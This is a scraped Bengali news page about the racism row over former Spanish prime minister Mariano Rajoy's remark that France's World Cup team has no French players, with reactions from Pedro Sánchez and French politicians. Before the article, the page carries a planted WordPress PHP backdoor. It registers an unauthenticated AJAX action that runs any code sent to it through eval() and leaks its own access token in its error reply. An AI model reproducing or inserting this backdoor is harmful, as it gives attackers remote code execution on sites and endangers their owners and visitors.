// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ফ্রান্স দলকে নিয়ে সাবেক স্প্যানিশ প্রধানমন্ত্রীর মন্তব্যে বর্ণবাদের বিতর্ক | potrikaybangladesh.com
Monday, September 21, 2026
Homeফ্রান্স দলকে নিয়ে সাবেক স্প্যানিশ প্রধানমন্ত্রীর মন্তব্যে বর্ণবাদের বিতর্ক

ফ্রান্স দলকে নিয়ে সাবেক স্প্যানিশ প্রধানমন্ত্রীর মন্তব্যে বর্ণবাদের বিতর্ক

হাইভোল্টেজ সেমিফাইনালে স্পেন-ফ্রান্স মহারণের আগে বিতর্কের জন্ম দিয়েছেন স্পেনের সাবেক প্রধানমন্ত্রী মারিয়ানো রাহয়। ‘ফ্রান্স জাতীয় দলে কোনো ফরাসি খেলোয়াড় নেই’- রাহয়ের এমন মন্তব্যের জের ধরে দুই দেশে শুরু হয়েছে তীব্র রাজনৈতিক ও সামাজিক প্রতিক্রিয়া।

ফ্রান্সের বিপক্ষে ম্যাচের আগে স্প্যানিশ অনলাইন সংবাদপত্র এল ডিবেটে বিশ্বকাপ নিয়ে একটি কলাম লিখেছিলেন দেশটির সাবেক প্রধানমন্ত্রী রাহয়। সেই লেখাতেই এমন বিতর্কিত মন্তব্য করেছেন তিনি। 

রাহয় লিখেছেন, ‘ফ্রান্স দুইবারের বিশ্বচ্যাম্পিয়ন এবং সর্বশেষ বিশ্বকাপের রানার্সআপ। তারা এবারের বিশ্বকাপে এখন পর্যন্ত সব ম্যাচ জিতেছে এবং ফিফা র‌্যাঙ্কিংয়ের এক নম্বরে রয়েছে। দুর্দান্ত একটি স্কোয়াড আছে তাদের। তবে তাদের দলে কোনো ফরাসি খেলোয়াড় নেই। তারপরও তারা দারুণ খেলছে। সমীহ জাগানিয়া প্রতিপক্ষ হতে যাচ্ছে তারা’। 

রাহয়ের এমন মন্তব্যকে অনেকেই সরাসরি বর্ণবাদী বলে আখ্যা দিয়েছেন। সম্প্রতি প্যারাগুয়ের এক সিনেটর কিলিয়ান এমবাপ্পেকে নিয়ে যে বর্ণবাদী মন্তব্য করেছিলেন, তার সঙ্গেও রাহয়ের বক্তব্যের মিল খুঁজে পাচ্ছেন অনেকে। 

সাবেক প্রধানমন্ত্রীর এমন বিতর্কিত মন্তব্যের পর চুপ থাকেননি বর্তমান স্প্যানিশ পেদ্রো সানচেজ। সামাজিক যোগাযোগমাধ্যম এক্সে (সাবেক টুইটার) কড়া সমালোচনা করেছেন সানচেজ, ‘এখনো এমন অনেকে আছেন, যারা একজন মানুষের পরিচয় নির্ধারণ করেন তার পদবি, জন্মস্থান কিংবা গায়ের রঙ দিয়ে। বাকিরা বিশ্বাস করেন, দেশের প্রতি ভালোবাসা এবং সেই দেশের জন্য অবদান রাখার সদিচ্ছাই মানুষের প্রকৃত পরিচয়ের ভিত্তি। সেটা ফুটবল খেলেই হোক, প্রবীণদের সেবা করেই হোক কিংবা ব্যবসা প্রতিষ্ঠার মাধ্যমেই হোক। স্পেন তাদেরই, যারা দেশকে ভালোবাসে এবং দেশের জন্য কাজ করে। যারা বিদ্বেষী বক্তব্য দিয়ে দেশের ভাবমূর্তি ক্ষুণ্ন করে, তাদের জন্য নয়’। 

রাহয়ের এমন মন্তব্যে ফ্রান্সে অত্যন্ত বিরূপ প্রতিক্রিয়া সৃষ্টি হয়েছে। স্থানীয় একটি টেলিভিশন চ্যানেলকে ফ্রান্সের স্বরাষ্ট্রমন্ত্রী লরাঁ নুনিয়েজ বলেছেন, ‘এ ধরনের মন্তব্য সম্পূর্ণ অগ্রহণযোগ্য। ফ্রান্স বৈচিত্র্যে ভরপুর একটি দেশ। এখানে প্রত্যেক মানুষের নিজের জায়গা তৈরি করার সুযোগ রয়েছে’। 

ফরাসি কমিউনিস্ট পার্টির নেতা ফ্যাবিয়েন রোসেলও নিন্দা জানিয়েছেন এমন মন্তব্যের। তিনি বলেছেন, রাহয়ের এমন মন্তব্য তাকে প্যারাগুয়ের সিনেটর সেলেস্তে আমারিয়ার কিলিয়ান এমবাপেকে নিয়ে করা সাম্প্রতিক বিতর্কিত মন্তব্যের কথা মনে করিয়ে দিয়েছে। এক্সে এক দীর্ঘ পোস্টে তিনি এমবাপেকে ‘একজন ঔপনিবেশিক ক্যামেরুনিয়ান যিনি নিজেকে মরিয়াভাবে ফরাসি হিসেবে জাহির করার চেষ্টা করছেন’ বলে অভিহিত করেছিলেন।

রোসেল বলেছেন, ‘আমাদের দুর্দান্ত ফরাসি দলটিকে আঘাত করার জন্য তারা বারবার নোংরা বর্ণবাদী মন্তব্য ছুঁড়ে দিচ্ছে’। 

আরেক ফরাসি মন্ত্রী নাইমা মুৎশু বলেছেন, এসব মন্তব্য ফ্রান্সের বিরুদ্ধে পুষে রাখা বিদ্বেষের বহিঃপ্রকাশ, ‘যখনই ফ্রান্স জেতে, তখনই এসব বর্ণবাদী ও বিদ্বেষমূলক মন্তব্য সামনে আসতে আসে। এগুলো কেবল মুখ ফসকে বলা কথা নয়, বরং ফ্রান্স এবং আমাদের মূল্যবোধের বিরুদ্ধে পরিকল্পিত বিদ্বেষের বহিঃপ্রকাশ’। ফরাসি ফুটবল ফেডারেশনকে এ ধরনের মন্তব্যের বিরুদ্ধে সম্ভাব্য সব ধরণের আইনি পদক্ষেপ নেওয়ার আহ্বানও জানিয়েছেন তিনি। 

 

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments